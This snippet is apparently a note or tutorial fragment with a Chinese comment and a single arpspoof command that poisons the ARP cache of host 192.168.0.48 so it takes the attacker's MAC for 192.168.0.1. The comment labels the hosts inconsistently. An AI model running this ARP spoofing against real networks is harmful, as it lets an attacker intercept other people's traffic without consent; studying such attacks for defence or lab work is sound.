# 告诉网关(0.48)，路由器(0.1)的 MAC 是我的
sudo arpspoof -i eth0 -t 192.168.0.48 192.168.0.1
